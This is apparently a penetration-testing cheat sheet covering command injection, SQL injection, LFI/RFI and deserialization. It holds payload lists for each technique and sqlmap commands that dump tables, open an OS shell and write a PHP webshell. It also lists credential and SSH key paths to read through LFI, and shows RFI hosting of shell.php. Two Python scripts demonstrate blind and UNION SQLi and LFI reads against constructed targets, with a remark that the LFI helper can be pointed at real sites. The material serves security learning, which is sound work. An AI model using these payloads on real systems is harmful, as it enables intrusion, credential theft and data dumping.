Injection/LFI

Command and Database 😍

Command Injection

Some functions on a site may actually be running an OS command under the hood (ping, nslookup, file conversion, etc.). Visible (in-band) injection returns the command's output or error text in the response; blind injection returns nothing, so success has to be confirmed out-of-band (a ping or DNS lookup to a host we control) or with a time delay (sleep). Reading a world-readable file is the quickest way to prove a visible injection worked.

/etc/passwd                 # Linux world-readable
C:\Windows\win.ini          # Windows world-readable
ping -c 4 m4lwhere.org      # Blind check: ping a host we own and watch for it with tcpdump -i any icmp (-c is Linux ping; Windows ping uses -n)
" & ping m4lwhere.org & rem # Windows: the " closes the quoted argument, & is cmd's command separator, and REM comments out the rest of the line

Character            Meaning
;                    Execute more commands inline (Linux; on Windows cmd use & instead)
|                    Pipe output from prev command to next command
||                   Will execute next command ONLY if previous was UNSUCCESSFUL
&                    Send command to a background process on Linux; on Windows cmd it is a plain command separator
&&                   Will execute next command ONLY if previous was SUCCESSFUL
>                    Output to file and overwrite
>>                   Output to file and append
<                    Input from a file
#                    Comment out the rest of the command, very useful if there's a lot of command left after the injection point
?                    Single-character wildcard (glob), can be chained: /???/??t matches /bin/cat
[1-9]                Character set (glob), matches any single character in the range
{echo,hello,there}   Bash brace expansion, expands to echo hello there; handy when spaces are filtered (bash only, dash/sh won't expand it)
`id`                 Command substitution, runs id first and substitutes its output into the rest of the command
$(id)                Command substitution, same as backticks but nestable
${IFS}               Internal Field Separator, expands to whitespace, so cat${IFS}/etc/passwd works when literal spaces are filtered

Tools

Programs such as commix automate command injection and make it very easy; just keep in mind that they send a lot of requests and may overwhelm the server.

SQLi

Super fun, get in the database and dump it. To test for SQLi, put special characters into the input fields and observe how the application's response changes (SQL error text, missing results, a different page). Blind SQLi relies on side channels instead of error messages: time delays (sleep), string concatenation of known-good values, or boolean true/false conditions.

'
"
')
")
'; -- 
"; --
'); -- 
"); --
' or 1=1; --
' or 1; --
' or 'a'='a    # Quote balancing, expects that there's another "'" at the end of the query
SELECT @@version    # Determine the database version (MySQL and SQL Server; PostgreSQL uses SELECT version())
SELECT name, sql FROM sqlite_master    # For sqlite databases, lists every table with its CREATE statement
# Note: in MySQL the -- comment needs a trailing space (or use #)

Injection Points

Just like anything else, we want to FUZZ EVERYTHING. Generally, these injection points are located at the places below:

  • GET parameters

  • POST data parameters

  • HTTP cookies (Think ones that show an access level)

  • HTTP User Agent

Blind SQLi

Generally occurs when the application hides database errors behind a custom error page (or shows nothing at all), which makes identifying and exploiting SQLi more difficult. Concatenating strings for a known-good value can determine whether the database is directly interpreting what we provide: if the split-up value still matches, the quotes were parsed as SQL rather than treated as data.

m4l'/**/'where == m4l' 'where == m4lwhere   # MySQL joins adjacent string literals, so all of these compare equal; use 'm4l'||'where' on Oracle/PostgreSQL/SQLite and 'm4l'+'where' on SQL Server

Boolean testing can help determine blind SQLi vulnerabilities as well: send a known-good value with a 💯 false condition appended, then the same known-good value with a 💯 true condition, and compare the two responses :)

m4lwhere' AND 1; --     # Always true: if the username is valid the page should behave normally
m4lwhere' AND 0; --     # Always false: same known-good username, but if the SQL is being interpreted the match now fails

Verbs

Verb      Meaning
SELECT    Retrieve content from a table
INSERT    Add content to a table
UPDATE    Modify data in a table
DELETE    Remove rows from a table
DROP      Drop the WHOLE table
UNION     Combine the result sets of two or more SELECTs (they must return the same number of columns)

Query Modifiers

Modifier         Meaning
WHERE            Rows must meet a certain condition first
AND              Must meet both conditions
OR               Must meet at least one condition
LIMIT 1,10       MySQL: return 10 rows starting at offset 1 (offsets are zero-based, so the first row is skipped)
ORDER BY user    Sort by column user when presenting data

SQL Characters

Character       Meaning
', "            String delimiter
;               End of a SQL statement (stacked queries only work if the driver executes multiple statements)
--, #, /*       Comment characters: -- needs a trailing space in MySQL, # is MySQL-only, /* ... */ is a block comment
||, +, " "      String concatenation: || in Oracle/PostgreSQL/SQLite, + in SQL Server, adjacent literals (or CONCAT()) in MySQL
+, <, >, =      Arithmetic and comparison operators
()              Used to call subqueries or functions
%00             URL-encoded null byte; can truncate the input in back-ends that treat it as a C-string terminator

Union Attacks

Used to pull data from other tables or databases into the results of the vulnerable query. The injected SELECT must return the same number of columns (with compatible types) as the original statement! First work out how many columns the original query returns, then build the UNION from there. https://portswigger.net/web-security/sql-injection/union-attacks

# Repeat, incrementing the number, until the query errors: ORDER BY n fails once n exceeds the number of columns
' ORDER BY 1-- 
' ORDER BY 2-- 
' ORDER BY 3-- 

# Same idea with NULLs (NULL is compatible with every column type): the first one that doesn't error gives the column count
' UNION SELECT NULL-- 
' UNION SELECT NULL,NULL-- 
' UNION SELECT NULL,NULL,NULL-- 

# Example exploit, appends the stolen rows to the intended results (original query returns two columns here)
' UNION SELECT username, password FROM users-- 
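Added example (not from the original page) that runs the quote-balancing, boolean-blind (from the Blind SQLi section above) and ORDER BY / UNION techniques against a constructed in-memory SQLite database. The schema, the rows and the vulnerable lookup function are all made up for the demo; the lookup swallows database errors the way a custom error page would, so every technique has to work from "normal page vs. different page" alone. The page's `'; --` payloads are written as `'-- ` here because Python's sqlite3 driver refuses stacked statements; the comment still eats the trailing quote.

```python
"""Blind and UNION SQL injection against a constructed SQLite target.
The database, its rows and lookup_user() are invented for this demo."""
import sqlite3


def build_target() -> sqlite3.Connection:
    """Constructed sample database: two tables so the UNION has something to steal."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users(username, password, role) VALUES
            ('m4lwhere', 'hunter2', 'user'),
            ('admin',    's3cr3t',  'admin');
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products(name, price) VALUES ('widget', 9.99), ('gadget', 19.99);
    """)
    return conn


def lookup_user(conn, username: str):
    """Constructed vulnerable endpoint: concatenates the input into the query.
    Two columns come back, which is what a UNION has to match. A SQL error is
    swallowed and returned as None, mimicking a custom error page: the attacker
    never sees the database's message, only that the page behaved differently."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    try:
        return [tuple(row) for row in conn.execute(sql)]
    except sqlite3.Error:
        return None


def quote_balance(conn):
    """' or 'a'='a  ->  WHERE username = '' or 'a'='a'  : every row matches."""
    return lookup_user(conn, "' or 'a'='a")


def boolean_blind(conn, known_good: str = "m4lwhere") -> bool:
    """Known-good value with an always-true and an always-false tail; if the two
    responses differ, our input is being parsed as SQL."""
    true_page = lookup_user(conn, f"{known_good}' AND 1-- ")
    false_page = lookup_user(conn, f"{known_good}' AND 0-- ")
    return bool(true_page) and not false_page


def count_columns(conn, limit: int = 10) -> int:
    """ORDER BY n errors (here: None) once n exceeds the original query's column count."""
    for n in range(1, limit + 1):
        if lookup_user(conn, f"x' ORDER BY {n}-- ") is None:
            return n - 1
    return limit


def union_null_probe(conn, n: int) -> bool:
    """UNION SELECT NULL,... with n NULLs: no error means n matches the column count."""
    nulls = ",".join(["NULL"] * n)
    return lookup_user(conn, f"x' UNION SELECT {nulls}-- ") is not None


def union_dump(conn, columns: str = "username, password", table: str = "users"):
    """Append rows from another table to the intended results; 'x' matches no real
    user, so only the stolen rows come back. Sorted for a stable result."""
    rows = lookup_user(conn, f"x' UNION SELECT {columns} FROM {table}-- ")
    return sorted(rows) if rows else rows


def enumerate_schema(conn):
    """SQLite's catalog table from the cheat sheet: table name + CREATE statement."""
    return union_dump(conn, "name, sql", "sqlite_master")


if __name__ == "__main__":
    db = build_target()
    print("quote balance:", quote_balance(db))
    print("boolean blind confirms SQLi:", boolean_blind(db))
    cols = count_columns(db)
    print("columns:", cols, "null probe ok:", union_null_probe(db, cols))
    print("dump:", union_dump(db))
    print("schema:", enumerate_schema(db))
```

Note the order: count the columns first (ORDER BY, then confirm with NULLs), because `UNION SELECT username, password` only works once it matches the two columns the original query returns.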

Exploitation and Exfil

Use stacked queries (a second statement after the ;) to create new tables and stage data to be exfiled. This only works when the driver/database combination executes multiple statements per call (common with SQL Server and PostgreSQL, rare with PHP + MySQL).

m4lwhere'; CREATE TABLE exfil(data varchar(1000));-- 
LOAD_FILE('/etc/passwd')    # Used to read a file, MySQL (needs the FILE privilege and secure_file_priv must allow the path)
BULK INSERT exfil FROM 'C:\Windows\win.ini'    # Used to read a file into a table, SQL Server
# Anything we write into the db may be rendered later: XSS payloads stored in a table the site displays

Tools

There are a ton of useful tools; sqlmap is the most useful for exploitation imo. The mysql client is available on most hosts and is easy to connect with and manage the db from.

# Built-in mysql tools
mysql -u root    # Connect to the local db as root; fresh installs often have no password
mysql -u root -p -h 10.10.10.1    # Connect to db at host 10.10.10.1 as root, prompts for password
mysql -u user1 -puser1pass    # Connect to local db. NOTE no space after '-p' for password!
mysqlshow -u theseus -piamkingtheseus    # Again, NO SPACE AFTER -p FOR PASSWORD

# Inside the mysql shell
show databases;          # List all dbs on server
use wordpress;           # Use a specific db
show tables;             # Show all tables for current db
describe wp_users;       # Show columns for a specific table
select * from wp_users;  # Dump all records from a table
select group_concat(user_login) from wp_users;    # Gather every value of the user_login column as one comma-separated result (handy when only one row is displayed)
select load_file('/etc/passwd');    # Read a local file (needs the FILE privilege, secure_file_priv must allow the path)
select "<?php phpinfo() ?>" into outfile "/var/www/html/haha.php";    # Write a php file to the web root (same restrictions, and the mysql user needs write access there)

# SQLMap Usage and Examples
sqlmap -u "http://website.target/login.jsp" --data 'user=m4lwhere&pass=badpass'    # POST request with data
sqlmap -u "http://172.30.78.35/view.php?id=1"    # GET request
sqlmap -u "http://172.30.77.28/view.php?id=1&Search=Submit" -p id --cookie='PHPSESSID=sqdmeggl8nhp7kq63anc56hi77'    # GET request with a PHP session cookie (name=value), also explicitly states to inject on the 'id' param
    --user-agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0'    # Default user agent is sqlmap/<version>, not subtle! (--random-agent also works)
    --proxy http://127.0.0.1:8080    # Proxies all connections thru burp or something
    --referer http://m4lwhere.org/signup.php    # Adds the referer header to make requests less suspicious, some WAFs enforce referer for pages
sqlmap -u "http://172.30.78.35/view.php?id=1" --dbs       # Lists all dbs on the host
sqlmap -u "http://172.30.78.35/view.php?id=1" --tables    # Lists all tables inside all dbs on host

# After an injection point is found, use sqlmap to explore the db
--dbs    # List all dbs
--tables    # List all tables, does not require a -D database, will list all tables from all dbs without it!
--all    # Retrieve everything sqlmap can enumerate (noisy and slow)
-D website --tables    # List all tables from the 'website' db
-D website -T users --columns    # List all columns from the 'users' table in the 'website' db
-D website -T users --dump    # Dump the 'users' table :)
--os-shell    # Attempt to get an interactive OS shell (needs file write or xp_cmdshell style privileges on the db)
--file-read /etc/passwd    # Attempt to read a system file
--file-write shell.php --file-dest /var/www/html/shell.php    # Write a local file (e.g. a php webshell) to a path on the server
--reg-add    # Add a windows reg key (think a powershell startup script); needs --reg-key, --reg-value, --reg-data and --reg-type
--reg-del    # Deletes a windows reg key (with --reg-key / --reg-value)

LFI/RFI

LFI Files to Read

If we find we have LFI, we can try to read interesting files. Keep in mind that PHP source files get executed rather than displayed, so to read them we wrap the path in the php://filter wrapper and have PHP encode the file before it is served. With allow_url_include on, we can also make the site load PHP we provide directly through the data:// wrapper.

http://example.thm.labs/page.php?file=php://filter/convert.base64-encode/resource=/etc/passwd    # base64-encoded file contents, decode locally
http://example.thm.labs/page.php?file=php://filter/read=string.rot13/resource=/etc/passwd    # rot13-encoded contents, same idea
http://example.thm.labs/page.php?file=data://text/plain;base64,QW9DMyBpcyBmdW4hCg==    # Inline payload, requires allow_url_include=On
# Unix based files of interest
/etc/passwd
/etc/group
/etc/shadow              # Very unlikely (root-only) but worth a shot
/etc/os-release
/etc/issue
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]*   # First number is the PID, second is the file descriptor
/proc/self/environ       # Environment of the web server process, can hold creds
/proc/version
/proc/cmdline

# Windows based files of interest
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf

# Config files
./.htaccess
./.htpasswd
./login.php               # Find the login.php page and follow it to whichever file holds the database credentials
/var/log/apache2/access.log, /var/log/httpd/access_log, /var/log/nginx/access.log    # Log files: potential log poisoning if a log is included/rendered on the page
wp-config.php             # Wordpress config, contains mysql creds

# PHP Session Storage (session.save_path)
c:\Windows\Temp
/tmp/
/var/lib/php5
/var/lib/php/session      # RHEL/CentOS
/var/lib/php/sessions     # Debian/Ubuntu

# SSH Keys
/home/user/.ssh/id_rsa
/root/.ssh/id_rsa
~/.ssh/id_dsa
~/.ssh/id_ecdsa
~/.ssh/id_ed25519
~/.ssh/id_rsa
/var/www/.ssh/authorized_keys     # If a www-user account has write permissions, check home folder in /etc/passwd then attempt to drop a key

Gathering PHP Session Information

PHP names its session files sess_<SESSION_ID> by default, and the SESSION_ID is the value of the PHPSESSID cookie the server sets in the browser.

To find the session ID in the browser, open the developer tools (SHIFT+CTRL+I), then the Application tab (Storage in Firefox). From the left menu, select Cookies and select the target website. There is a PHPSESSID entry and its value. In my case, the value is vc4567al6pq7usm2cufmilkm45, so the file will be sess_vc4567al6pq7usm2cufmilkm45. If session.save_path is /tmp (the default when it is unset), the full path is /tmp/sess_vc4567al6pq7usm2cufmilkm45 and we can use the LFI to include the session file. Anything the application stores in $_SESSION ends up in that file, so if we control one of those values we control what the LFI includes.
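Added example (not code from the original page) covering the two LFI pieces above: why the php://filter wrapper is needed to read PHP source, and how to turn a PHPSESSID cookie into the session file paths to try. The "server" is a constructed stand-in for PHP's include(): a tiny in-memory filesystem where .php files are executed (their output is returned, never their source) and the php://filter and data:// wrappers are emulated. The file contents, credentials and cookie are all made up.

```python
"""LFI helpers against a constructed PHP include() emulator.
FAKE_FS, fake_php_include() and the sample cookie are invented for this demo."""
import base64
import codecs
import re
from urllib.parse import unquote

# Constructed target filesystem. config.php holds the creds we want to read.
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n",
    "/var/www/html/config.php": "<?php\n$db_user = 'wpuser';\n$db_pass = 'Sup3rS3cret';\n",
}


def fake_php_include(file_param: str) -> str:
    """Emulates the vulnerable page: include($_GET['file']) with allow_url_include on."""
    if file_param.startswith("data://"):                       # inline payload is 'executed'
        header, payload = file_param.split(",", 1)
        body = base64.b64decode(payload).decode() if ";base64" in header else unquote(payload)
        return f"[executed inline PHP: {body!r}]"
    if file_param.startswith("php://filter/"):
        m = re.match(r"php://filter/(?:read=)?([^/]+)/resource=(.*)", file_param)
        filt, path = m.group(1), m.group(2)
        raw = FAKE_FS.get(path, "")
        if filt == "convert.base64-encode":
            return base64.b64encode(raw.encode()).decode()
        if filt == "string.rot13":
            return codecs.encode(raw, "rot13")
        return raw
    raw = FAKE_FS.get(file_param, "")
    if file_param.endswith(".php"):
        return ""        # PHP executed the file; config.php only sets variables, so nothing is printed
    return raw           # non-PHP files are echoed verbatim


def read_via_lfi(path: str, fetch=fake_php_include) -> dict:
    """Try the three ways of pulling a file through ?file= and decode each answer.
    For a .php file only the two filter variants reveal the source."""
    return {
        "plain":  fetch(path),
        "base64": base64.b64decode(fetch(f"php://filter/convert.base64-encode/resource={path}")).decode(),
        "rot13":  codecs.decode(fetch(f"php://filter/read=string.rot13/resource={path}"), "rot13"),
    }


# Common session.save_path locations from the list above, most likely first.
SESSION_DIRS = ["/tmp", "/var/lib/php/sessions", "/var/lib/php/session", "/var/lib/php5", "C:\\Windows\\Temp"]


def session_file_candidates(cookie_header: str) -> list:
    """Pull PHPSESSID out of a Cookie header and build the sess_<id> paths to try.
    PHP session ids use [0-9a-zA-Z,-] depending on session.sid_bits_per_character."""
    m = re.search(r"(?:^|;\s*)PHPSESSID=([A-Za-z0-9,-]+)", cookie_header)
    if not m:
        return []
    name = f"sess_{m.group(1)}"
    return [d + ("\\" if "\\" in d else "/") + name for d in SESSION_DIRS]


if __name__ == "__main__":
    print(read_via_lfi("/var/www/html/config.php"))
    print(session_file_candidates("PHPSESSID=vc4567al6pq7usm2cufmilkm45; theme=dark"))
```

Against a real target, swap fake_php_include for a function that requests page.php?file=... and returns the response body; the decoding and the candidate session paths stay the same.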

Serving RFI

A server/firewall might block outbound HTTP, which breaks a normal RFI, but could still allow outbound SMB (445) to fetch the malicious page; Windows targets will happily include a UNC path.

# Basic python
python3 -m http.server 8081
http://127.0.0.1:8081/shell.php    # 127.0.0.1 stands in for our listener's IP

# SMB hosting
impacket-smbserver share . -smb2support    # impacket's smbserver.py, shares the current directory as 'share'
\\127.0.0.1\share\shell.php

Deserialization Attacks

Injection attacks where data stored as bytes is later interpreted as instructions. It is an issue in any language with native object serialization (Java, PHP, .NET, Python, ...). Serialized objects are often handed to the client (cookies, hidden form fields, view state) before they are sent back to the server to be rebuilt into objects inside the web app.

RCE from deserialization most often comes from a JVM calling readObject() on attacker-controlled bytes, where the attacker supplies a chain of objects built from classes already on the classpath whose methods do something dangerous while the object is being rebuilt (a gadget chain).

Programs such as ysoserial.jar generate these payloads for us; creating one by hand means assembling a huge chain of serialized objects.
